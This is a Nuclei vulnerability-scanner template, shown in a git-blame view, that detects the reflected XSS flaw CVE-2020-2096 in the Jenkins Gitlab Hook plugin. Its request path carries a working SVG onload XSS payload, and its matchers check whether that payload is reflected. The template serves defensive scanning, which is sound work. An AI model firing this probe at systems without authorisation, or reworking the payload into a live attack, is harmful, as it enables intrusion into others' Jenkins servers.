nuclei-templates/cves/2020/CVE-2020-2096.yaml

27 lines
825 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-2096
2020-04-08 10:59:57 +00:00
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2021-03-10 10:53:21 +00:00
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
reference:
2021-03-10 11:31:41 +00:00
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
tags: cve,cve2020,jenkins,xss
2020-04-08 10:59:57 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers-condition: and
2020-04-08 10:59:57 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 14:42:57 +00:00
- type: word
words:
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-04-08 10:59:57 +00:00
part: body